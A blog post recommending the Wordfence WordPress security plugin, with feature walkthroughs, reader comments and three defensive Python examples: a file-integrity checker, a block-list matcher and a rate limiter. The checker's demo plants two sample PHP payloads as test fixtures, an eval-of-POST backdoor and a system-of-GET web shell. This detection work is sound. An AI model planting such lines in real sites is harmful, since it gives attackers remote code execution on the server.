Dealing with WordPress hacks is a huge hassle. I have had the unfortunate experience of cleaning up after these tedious hacks many times during my web design career. There are a lot of security plugins for WordPress, and it is hard to pick the best one. There is one plugin, though, that can drastically improve your WordPress security. Take it from me: it is a safety net for your WordPress site. If I were to compile a list of “must have” plugins, this one would certainly be on it. It is that important. Its name is “Wordfence.” This plugin is very powerful, and I use it on all of my WordPress sites.
I found this excellent YouTube video that walks through all of Wordfence’s features:
Wordfence fights off scrapers, aggressive robots, fake bots, unauthorized login attempts, and even sustained brute-force attacks. It can also restore modified core WordPress files to their original versions.
Okay, so first of all (and probably best of all), this plugin is free. It has premium (paid) options, but they are not required to begin with; they are added features for when you are satisfied with how the free plugin performs. As a security plugin, it works by scanning your site at regular intervals throughout the day for malware, backdoors, and other suspicious files, code, and links. Other security plugins do this too, but what is good about Wordfence is that it is lightweight. In normal operation it does not noticeably slow down page loads, and neither you nor your visitors will feel that something is running in the background.
Once Wordfence is installed, click the Wordfence item in your WordPress dashboard menu, then click “Scan.” There, click “Start a Wordfence Scan,” and Wordfence will begin scanning your website.
It checks the following:
- Your server for the Heartbleed vulnerability.
- Core, theme, and plugin files against their known signatures.
- Known malware files, using Wordfence’s malware signatures.
- Core WordPress files against the originals in the WordPress.org repository.
- File contents for infections and known vulnerabilities.
- Files, posts, and comments for URLs on the Google Safe Browsing list.
- Weak passwords.
- DNS records for unauthorized changes.
- Available disk space.
A scan typically takes about two minutes, depending on how big your site is, and you can keep working on the site while it runs.
Next, a box labeled “New Issues” will show you everything the scan found. For each issue you can mark it as fixed, fix it (for example, restore the file), or ignore it. What I like about this plugin is that when a file has a problem, you can view it side by side with its original. You can then see exactly which line of code is suspicious and restore the original core file.
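To make concrete what the core-file comparison in the scan does, here is a small file-integrity checker, added as an example for this page; it is not Wordfence’s code and does not talk to the WordPress.org repository. It builds a throwaway site tree (every file, the injected eval line, and the dropped shell are constructed for the example), compares each file’s SHA-256 against a known-good manifest, reports modified, added, missing, and ignored files, points at the changed line, and restores the pristine copy, the same sequence of actions as the scan results and “restore” step described above. The PRISTINE dictionary stands in for the originals a real scanner would fetch from the repository.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Pristine copies of a few files, constructed for this example. They stand in
# for what a real scanner fetches from the WordPress.org repository; the
# manifest of hashes is what the scan actually compares against.
PRISTINE = {
    "wp-includes/version.php": b"<?php\n$wp_version = '4.1';\n",
    "wp-includes/functions.php": b"<?php\nfunction wp_hello() { return 'hello'; }\n",
    "readme.txt": b"Welcome to WordPress.\n",
}
MANIFEST = {path: sha256_bytes(body) for path, body in PRISTINE.items()}

# Changes to files with these suffixes are reported separately rather than as
# modifications (the "ignore .txt changes" choice mentioned in the comments).
IGNORED_SUFFIXES = (".txt",)


def scan_tree(root, manifest, ignored_suffixes=IGNORED_SUFFIXES):
    """Hash every file under root and classify it against the manifest.

    Returns {"modified": [...], "added": [...], "missing": [...], "ignored": [...]}
    with paths relative to root, sorted so the output is stable."""
    result = {"modified": [], "added": [], "missing": [], "ignored": []}
    seen = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            seen.add(rel)
            with open(full, "rb") as fh:
                digest = sha256_bytes(fh.read())
            if rel not in manifest:
                result["added"].append(rel)  # unknown file: possibly a dropped shell
            elif digest != manifest[rel]:
                bucket = "ignored" if rel.endswith(ignored_suffixes) else "modified"
                result[bucket].append(rel)
    result["missing"] = [rel for rel in manifest if rel not in seen]
    for key in result:
        result[key].sort()
    return result


def diff_lines(original: bytes, current: bytes):
    """1-based numbers of the lines that differ, i.e. what a side-by-side view highlights."""
    o = original.decode("utf-8", "replace").splitlines()
    c = current.decode("utf-8", "replace").splitlines()
    return [i + 1 for i in range(max(len(o), len(c)))
            if (o[i] if i < len(o) else None) != (c[i] if i < len(c) else None)]


def restore_file(root, rel):
    """The "restore" action: overwrite the modified file with its pristine copy."""
    with open(os.path.join(root, rel), "wb") as fh:
        fh.write(PRISTINE[rel])


def build_demo_site():
    """Throwaway site tree with one injected backdoor line in a core file, one
    dropped PHP file under uploads, one missing core file, and one harmless
    readme edit. Everything here is constructed for the example."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    for rel, body in PRISTINE.items():
        if rel == "wp-includes/version.php":
            continue  # deliberately left out so it shows up as missing
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    with open(os.path.join(root, "wp-includes/functions.php"), "ab") as fh:
        fh.write(b"eval(base64_decode($_POST['c']));\n")  # classic injected backdoor
    with open(os.path.join(root, "readme.txt"), "ab") as fh:
        fh.write(b"Edited by the host.\n")
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(uploads, ".cache.php"), "wb") as fh:
        fh.write(b"<?php system($_GET['cmd']);\n")  # dropped web shell
    return root


def run_demo():
    """Scan, locate the suspicious line, restore the core file, and rescan."""
    root = build_demo_site()
    try:
        before = scan_tree(root, MANIFEST)
        with open(os.path.join(root, "wp-includes/functions.php"), "rb") as fh:
            suspicious = diff_lines(PRISTINE["wp-includes/functions.php"], fh.read())
        restore_file(root, "wp-includes/functions.php")
        after = scan_tree(root, MANIFEST)
    finally:
        shutil.rmtree(root)
    return {"before": before, "suspicious_lines": suspicious, "after": after}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

Note that the “added” bucket is the one that catches a dropped shell like the `.cache.php` above: a file that is not in any manifest can never be “modified,” so a checker that only compares known files misses it.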
More than just a security plugin, Wordfence also shows you real-time traffic from humans and non-humans alike: bots, spiders, logins, logouts, anything that hits your site. So if your favorite analytics plugin does not give you this information, this is a must have. However, the live traffic view can use a lot of resources and cause speed and loading-time problems on your website. If you run into trouble with loading times, try disabling the live traffic feature.
Wordfence also offers several performance options, found under Wordfence > Performance Setup. You can enable caching so that the plugin does not hog your server’s resources. There are three options:
- Disable all performance enhancements.
- Enable basic caching (2 to 3 times speed increase).
- Enable the Wordfence Falcon Engine (30 to 50 times speed increase).
You can also configure the cache to work with SSL (HTTPS pages), add hidden debugging data to the bottom of the HTML source of a cached page, and clear the cache when a scheduled post is published.
You can clear the cache, or view cache statistics, at any time.
You can add exclusions so that certain URLs, cookies, and browsers (user agents) are never cached. Each exclusion is a condition: URL starts with, URL ends with, URL contains, URL exactly matches, user-agent contains, user-agent exactly matches, or cookie name contains. Enter the value and click “Add Exclusion.” At a minimum, exclude logged-in sessions and anything carrying a user-specific cookie; serving a page cached for one user to another is a classic information leak.
You can manage the IP addresses that visit your website: manually add IP addresses to the block list, lock IPs out, and see which IPs were recently throttled for accessing the site too frequently. So if you think a particular IP address is a problem, blocking it is as simple as adding it here.
Cellphone sign-in (two-factor authentication using a code sent to your phone) is only available with a premium membership. You configure it by entering the WordPress username and the cell phone number to tie it to.
A premium membership also lets you block visitors by country. Blocked visitors can be sent to the standard Wordfence blocked message or to a custom URL. This is an excellent option if you see a DDoS or a steady stream of attacks coming from one country, Turkey in my case. I love this feature. Keep in mind that country blocking is coarse: it relies on geolocating the source IP, so an attacker coming through a proxy or VPN in another country is not stopped, while legitimate visitors from the blocked country are.
Another premium feature is scheduling when scans occur; you can run them at any time on any day of the week. It is a good idea to run a scan at least once a week to make sure your WordPress site isn’t infected with malware.
If an IP looks suspicious, you can copy and paste it into Wordfence and it will show you everything it knows about that IP. You don’t have to go to who.is or another WHOIS site; it is all done from your WordPress dashboard.
Advanced blocking is available in the free version. You can block IP address ranges, for example 192.168.200.200 – 192.168.200.220. You can block user agents too, using * as a wildcard and commas between patterns, for example *badRobot*, AnotherBadRobot*, *someBrowserSuffix. You can block visitors referred from specific websites the same way: *badWebsite*, AnotherBadWebsite*, *someWebsiteSuffix. When you add a block there is a field for your reason; it is stored with the rule so that you can see later why a given range, user agent, or referrer was blocked. Keep in mind that the user-agent and referrer strings are set by the client and are trivial to fake, so those two rule types stop lazy bots, not a determined attacker.
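Here is what those three rule types amount to when implemented, as an added example written for this page and not Wordfence’s own code: IP ranges are compared numerically, and the user-agent and referrer patterns are translated so that * matches anything and everything else is literal. The access-log lines are constructed for the example, and case-insensitive pattern matching is an assumption of this example rather than documented Wordfence behaviour. Running the rules over a log also makes the weakness above visible: the two client-supplied strings are the only thing the last two rule types have to go on.

```python
import ipaddress
import re

# One line of an Apache/nginx "combined" access log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def wildcard_to_regex(pattern: str):
    """'*' matches anything, everything else is literal, the whole string must match.
    Case-insensitive matching is an assumption of this example."""
    parts = [re.escape(piece) for piece in pattern.strip().split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE)


def parse_ip_range(text: str):
    """'192.168.200.200 - 192.168.200.220' -> (start, end) as ip_address objects."""
    start, end = (ipaddress.ip_address(p.strip()) for p in text.split("-", 1))
    if start.version != end.version or end < start:
        raise ValueError("bad range: %r" % text)
    return start, end


class BlockList:
    """The three advanced-blocking rule types, evaluated in the order IP range,
    user agent, referrer. Each rule carries the reason typed into the form."""

    def __init__(self):
        self.ip_ranges = []       # (start, end, reason)
        self.ua_rules = []        # (pattern, compiled regex, reason)
        self.referrer_rules = []  # (pattern, compiled regex, reason)

    def block_ip_range(self, text, reason):
        start, end = parse_ip_range(text)
        self.ip_ranges.append((start, end, reason))

    @staticmethod
    def _add_patterns(rules, csv, reason):
        # The form takes a comma-separated list such as "*badRobot*, AnotherBadRobot*".
        for pat in csv.split(","):
            if pat.strip():
                rules.append((pat.strip(), wildcard_to_regex(pat), reason))

    def block_user_agents(self, csv, reason):
        self._add_patterns(self.ua_rules, csv, reason)

    def block_referrers(self, csv, reason):
        self._add_patterns(self.referrer_rules, csv, reason)

    def check(self, ip, user_agent, referrer):
        """Return the block reason for a request, or None if it is allowed."""
        addr = ipaddress.ip_address(ip)
        for start, end, reason in self.ip_ranges:
            if addr.version == start.version and start <= addr <= end:
                return "ip range %s-%s: %s" % (start, end, reason)
        # The next two fields are chosen by the client; a real attacker simply
        # sends a browser-looking user agent and no referrer.
        for pattern, rx, reason in self.ua_rules:
            if rx.match(user_agent):
                return "user-agent %r: %s" % (pattern, reason)
        for pattern, rx, reason in self.referrer_rules:
            if referrer != "-" and rx.match(referrer):
                return "referrer %r: %s" % (pattern, reason)
        return None


def apply_to_log(lines, blocklist):
    """[(ip, reason-or-None)] for every parsable access-log line."""
    decisions = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            decisions.append((m["ip"], blocklist.check(m["ip"], m["ua"], m["referrer"])))
    return decisions


# Constructed sample traffic: one hit from inside the blocked range, one just
# outside it, a bot with a give-away user agent, referrer spam, a user agent
# matching a suffix pattern, and a search-engine crawler that should pass.
SAMPLE_LOG = [
    '192.168.200.205 - - [10/Mar/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.200.221 - - [10/Mar/2015:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Mar/2015:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; badRobot/1.0)"',
    '10.0.0.8 - - [10/Mar/2015:10:00:04 +0000] "GET /?s=pills HTTP/1.1" 200 2048 "http://badwebsite.example/spam" "Mozilla/5.0 (X11; Linux)"',
    '10.0.0.9 - - [10/Mar/2015:10:00:05 +0000] "GET /feed/ HTTP/1.1" 200 4096 "-" "Scrapy/1.0 someBrowserSuffix"',
    '10.0.0.10 - - [10/Mar/2015:10:00:06 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
]


def demo():
    bl = BlockList()
    bl.block_ip_range("192.168.200.200 - 192.168.200.220", "scraper on a hosting subnet")
    bl.block_user_agents("*badRobot*, AnotherBadRobot*, *someBrowserSuffix", "abusive bots")
    bl.block_referrers("*badWebsite*, AnotherBadWebsite*, *someWebsiteSuffix", "referrer spam")
    return apply_to_log(SAMPLE_LOG, bl)


if __name__ == "__main__":
    for ip, reason in demo():
        print(ip, reason or "allowed")
```

The first rule that matches wins, so a user agent such as “AnotherBadRobot 2.0” is reported under *badRobot* rather than AnotherBadRobot*; when you read the block log, the reported pattern is the first one that fired, not necessarily the one you had in mind when you added it.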
I use the free version on all my websites, but you can purchase the paid version at Wordfence.com. Here is the price per license (each license is one API key):
- 1 API key – $39.00/year.
- 2 API keys – $59.00/year.
- 3 API keys – $79.00/year.
- 4 API keys – $99.00/year.
- 5 API keys – $119.00/year.
You get a discount for buying the premium service for more than one year; currently you can purchase up to five years at once.
Don’t just take my word for it: Wordfence gets excellent reviews on WordPress.org. Here are some of the more interesting reviews of Wordfence:
I highly recommend the Wordfence security plugin. There are plenty of options you can configure to your liking. The free version is worth it, and the paid version is worth the money. You have to play it safe with your WordPress sites: every second, minute, hour, or day that a site is infected or down, we are losing clients, visitors, and money. Wordfence is easy to use, lightweight, and compatible with the latest versions of WordPress. This plugin has saved me an immense amount of time and headaches over the years. You can check out the plugin at https://wordpress.org/plugins/wordfence/
I want to hear what you think about this security plugin. If you have any questions, feedback, or comments about Wordfence, please leave them below.
Looks like a good plugin to install. Thanks for sharing!
Under “alerts” make sure the following are checked:
“Alert on critical problems”
“Alert on warnings”
“Alert when IP address is blocked”
“Alert when someone is locked out from login”
“Alert when the ‘lost password’ form is used for a valid user”
“Alert me when a non-admin user signs in”
With “scans” make sure everything is checked
Under “firewall rules” configure these settings:
Check “Immediately block fake Google crawlers”
Make sure “Verified Google crawlers have unlimited access to the site”
If anyone’s requests exceed: 240 per minute (4 per second) then throttle it
If a crawler’s page views exceed: 960 per minute (16 per second) then throttle it
If a crawler’s pages not found (404s) exceed: 960 per minute (16 per second) then throttle it
If a human’s page views exceed: 240 per minute (4 per second) then throttle it
If a human’s pages not found (404s) exceed: 240 per minute (4 per second) then throttle it
If 404s for known vulnerable URLs exceed: 120 per minute (2 per second) then throttle it
How long is an IP address blocked when it breaks a rule: 12 hours
Under “login security options” configure these settings:
Force admins and publishers to use strong passwords
Limit login failures and forgot-password attempts to 5
Set “count failures over” and “amount of time a user is locked out” to 6 hours.
Make sure these are checked:
Immediately lock out invalid usernames
Don’t let WordPress reveal valid users in login errors
Prevent users registering ‘admin’ username if it doesn’t exist
Prevent discovery of usernames through ‘?author=N’ scans
Hope this helps 🙂
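The throttling thresholds and login lockouts in the reply above come down to a sliding-window counter per IP plus a lockout table. What follows is an added example of that logic, written for this page rather than taken from Wordfence, using the numbers from the reply: 240 and 960 requests per minute, 120 per minute for 404s on known-vulnerable URLs, 5 login failures counted over 6 hours with a 6-hour lockout, and a 12-hour block. How Wordfence itself implements throttling is not shown here; in this example a throttled IP simply has its excess requests refused while its rate stays over the limit, whereas a blocked IP is locked out for the full 12 hours. The IPs and timings are constructed.

```python
from collections import defaultdict, deque

WINDOW = 60                 # the firewall thresholds are "per minute"
BLOCK_SECONDS = 12 * 3600   # "How long is an IP address blocked when it breaks a rule"
LOGIN_WINDOW = 6 * 3600     # count login failures over this period
LOCKOUT_SECONDS = 6 * 3600  # how long a login lockout lasts
LOGIN_FAILURE_LIMIT = 5

# (limit per minute, action). "throttle" refuses the excess requests while the
# rate stays over the limit; "block" locks the IP out for BLOCK_SECONDS. The
# reply uses throttle for all of them; "block" is here to show the 12-hour setting.
RULES = {
    "any_requests":  (240, "throttle"),
    "crawler_views": (960, "throttle"),
    "crawler_404s":  (960, "throttle"),
    "human_views":   (240, "throttle"),
    "human_404s":    (240, "throttle"),
    "vuln_url_404s": (120, "throttle"),
}

# Same text whether or not the username exists ("Don't let WordPress reveal valid users").
GENERIC_LOGIN_ERROR = "Invalid username or password."


class RateGuard:
    def __init__(self, rules=RULES):
        self.rules = rules
        self.events = defaultdict(deque)          # (ip, rule) -> timestamps in window
        self.login_failures = defaultdict(deque)  # ip -> failure timestamps
        self.locks = {}                           # ip -> (expires_at, reason)

    @staticmethod
    def _prune(dq, now, window):
        while dq and dq[0] <= now - window:
            dq.popleft()

    def is_locked(self, ip, now):
        entry = self.locks.get(ip)
        if entry and now < entry[0]:
            return True
        self.locks.pop(ip, None)  # expired or absent: forget it
        return False

    def request(self, ip, rule, now):
        """Record one event of kind `rule` from `ip` at time `now` (seconds); decide."""
        if self.is_locked(ip, now):
            return "blocked"
        limit, action = self.rules[rule]
        dq = self.events[(ip, rule)]
        self._prune(dq, now, WINDOW)
        dq.append(now)
        if len(dq) <= limit:
            return "allow"
        if action == "block":
            self.locks[ip] = (now + BLOCK_SECONDS, rule)
            return "blocked"
        return "throttled"

    def login_attempt(self, ip, username, password_ok, user_exists, now):
        """Apply the login rules from the reply; returns (allowed, message)."""
        if self.is_locked(ip, now):
            return False, GENERIC_LOGIN_ERROR
        if not user_exists:
            # "Immediately lock out invalid usernames": one guess is enough.
            self.locks[ip] = (now + LOCKOUT_SECONDS, "invalid username %r" % username)
            return False, GENERIC_LOGIN_ERROR
        if password_ok:
            self.login_failures.pop(ip, None)
            return True, "ok"
        dq = self.login_failures[ip]
        self._prune(dq, now, LOGIN_WINDOW)
        dq.append(now)
        if len(dq) >= LOGIN_FAILURE_LIMIT:
            self.locks[ip] = (now + LOCKOUT_SECONDS, "too many login failures")
        return False, GENERIC_LOGIN_ERROR


def demo():
    """Constructed scenarios; returns the observations as a dict."""
    g = RateGuard()
    out = {}
    # A human requesting 300 missing pages in half a minute: the 241st is refused.
    d = [g.request("203.0.113.5", "human_404s", t * 0.1) for t in range(300)]
    out["human_404_throttled_at"] = d.index("throttled") + 1
    # A scanner probing known-vulnerable URLs trips the lower limit on request 121.
    d = [g.request("203.0.113.6", "vuln_url_404s", t * 0.4) for t in range(121)]
    out["vuln_404_throttled_at"] = d.index("throttled") + 1
    # Once the minute has passed, the same IP is served again.
    out["vuln_404_after_window"] = g.request("203.0.113.6", "vuln_url_404s", 200.0)
    # Five wrong passwords for a real account lock the IP for six hours.
    for i in range(5):
        g.login_attempt("198.51.100.9", "admin", False, True, 1000 + i)
    out["bruteforce_locked"] = g.is_locked("198.51.100.9", 1005)
    out["bruteforce_locked_after_5h"] = g.is_locked("198.51.100.9", 1004 + 5 * 3600)
    out["bruteforce_locked_after_6h"] = g.is_locked("198.51.100.9", 1004 + 6 * 3600 + 1)
    # A guess at a non-existent username is locked out at once, and the error
    # text is identical to a wrong password for a real user.
    _, msg_invalid = g.login_attempt("198.51.100.10", "wpadmin", False, False, 2000)
    _, msg_valid = g.login_attempt("198.51.100.11", "admin", False, True, 2000)
    out["invalid_user_locked"] = g.is_locked("198.51.100.10", 2001)
    out["messages_identical"] = msg_invalid == msg_valid
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two points worth noticing when you tune these numbers. The per-rule windows are independent, so a scanner that spreads its probes across many kinds of request stays under each individual limit; the “anyone’s requests” rule is the catch-all for that. And an immediate lockout on an invalid username is only safe together with the generic error message: if the response revealed which usernames exist, the lockout would confirm a guess rather than hide it.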
Isso Beats says
Thanks for the article. I’ve been using the Wordfence free version for a while, but I’ve been getting a lot of chumps trying to hack into my site lately and I am buying the premium version today.
You should really check out this plugin then. The Wordfence security plugin is really a fantastic plugin. It will really help you a lot. There is a free and a paid version. The free version is very helpful. I typically like to install it on any websites I run. If your theme gets hacked you can always revert back to a previous version of the framework. This has really saved me lots of time and hassle. Just last week one of my clients’ websites was hacked and all I did was revert back. It took 1 minute. I got $50 for 1 minute of work, so it makes sense for web design businesses too. You can even use their service and implement it into your sales funnel. Lots of business owners would be interested in that kind of service.
Kim D. says
I was wondering what you think of the caching settings for Wordfence. I have used them in the past but they really don’t seem to be all that great? It seems to have conflicts with some other WordPress plugins.
I would have to say that I am really not a fan of Wordfence’s caching system. I do not use it; it doesn’t seem to be quite as effective as WP Super Cache.
I would recommend disabling the caching for Wordfence. But, Wordfence is great for security!
Mats Schmid says
Outstanding article! Wordfence is definitely a must have plugin. I am using it for all my WordPress websites upon recommendation from my hosting provider. It has very useful features to protect my site from hackers.
Going to certainly make a couple adjustments that you have suggested. I am even using the Premium version, too. Love it!
I have used WordFence for several years now. This plugin has saved me time and time again. When files get infected, I really like how you can revert back to a previous version. It’s very easy to do and is a lifesaver. However, WordFence does let you know when text files are changed. These are mostly just readme files from plugins or themes. It’s kind of annoying, but I always just disregard those.
Yeah, I know what you mean about Wordfence telling you .txt files have been changed. There is a button that you can click that will just ignore them in the future. I have used this for years. Never do I see those messages again!
I read that Wordfence slows down your website; what do you make of this?
I haven’t noticed that WordFence slows down your website. Sometimes the live traffic feature can use too many resources for your setup and cause problems. Maybe try disabling that option if you haven’t already.
Kat Chang says
Hi Garen, thanks for the article! I have been using Wordfence for a month now; however, my sites have been hacked every day this week despite having Wordfence on. I know it’s not 100%, and we can revert to the backup. It took the entire day to work out where the malware was (WF did not find it).
Will the premium version work better? What would your advice be?
Sometimes there are backdoors on your site or the server you are hosting your website on that security plugins would not be able to detect. There is a vulnerability somewhere that needs to be fixed. Have you asked your web host for help? Best of luck to you!